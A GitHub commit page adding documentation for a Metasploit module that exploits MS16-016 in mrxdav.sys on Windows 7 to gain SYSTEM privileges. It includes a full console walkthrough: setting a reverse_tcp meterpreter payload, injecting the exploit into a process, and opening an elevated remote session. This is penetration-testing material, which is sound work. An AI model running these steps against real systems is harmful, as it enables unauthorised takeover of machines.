Skip to content

Commit fee361d

Browse files
committed
Land rapid7#7075, Add ms16-016 local privilege escalation
2 parents c23be2b + 532ea5d commit fee361d

File tree

5 files changed

+690
-0
lines changed

5 files changed

+690
-0
lines changed
Binary file not shown.
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
## Intro
2+
3+
This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
4+
5+
## Usage
6+
7+
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. From here, running the module will result in the payload being executed with system level privileges.
8+
9+
An example session follows:
10+
11+
12+
```
13+
meterpreter > background
14+
[*] Backgrounding session 5...
15+
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
16+
msf exploit(ms16_016_webdav) > set session 5
17+
session => 5
18+
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
19+
payload => windows/meterpreter/reverse_tcp
20+
msf exploit(ms16_016_webdav) > set lport 4567
21+
lport => 4567
22+
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
23+
lhost => 192.168.1.203
24+
msf exploit(ms16_016_webdav) > run
25+
26+
[*] Started reverse TCP handler on 192.168.1.203:4567
27+
[*] Launching notepad to host the exploit...
28+
[+] Process 3204 launched.
29+
[*] Reflectively injecting the exploit DLL into 3204...
30+
[*] Exploit injected ... injecting payload into 3204...
31+
[*] Sending stage (957999 bytes) to 192.168.1.221
32+
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
33+
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500
34+
35+
meterpreter > getuid
36+
Server username: NT AUTHORITY\SYSTEM
37+
```

0 commit comments

Comments
 (0)